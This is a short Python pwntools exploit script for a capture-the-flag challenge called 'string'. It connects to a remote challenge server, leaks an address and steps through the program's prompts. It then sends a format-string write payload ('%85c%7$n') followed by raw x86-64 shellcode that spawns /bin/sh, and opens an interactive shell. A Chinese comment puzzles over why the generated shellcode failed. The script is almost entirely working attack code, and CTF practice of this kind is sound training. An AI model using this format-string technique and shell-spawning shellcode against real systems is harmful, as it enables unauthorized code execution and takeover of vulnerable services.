07_string

#-*-coding:utf-8 -*-
from pwn import *
#p = process('./string')
p = remote("111.198.29.45","30645")
p.recvuntil('secret[0] is ')
n = p.recvuntil('\n')
print n[:-1]
print int(n[:-1],16)
addrs = int(n[:-1],16)
print "addrs: " + hex(addrs)
# pause()
p.recvuntil('name be:\n')
p.sendline("n0va")
# p.sendlineafter("be:\n","n0va")
p.recvuntil('or up?:\n')    
p.sendline("east")
p.recvuntil('leave(0)?:\n')
p.sendline("1") 
# print "ok" 
p.recvuntil("address'\n")
p.sendline(str(addrs))
p.recvuntil('you wish is:\n')
payload = "%85c" + "%7$n"
p.sendline(payload)
#也不知道为什么 ，第一个shellcode就不行，下面的shellcode就可以
# shellcode = asm(shellcraft.sh())
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
# print len(shellcode)
# pause() 
p.recvuntil('USE YOU SPELL\n')
p.sendline(shellcode)
p.interactive()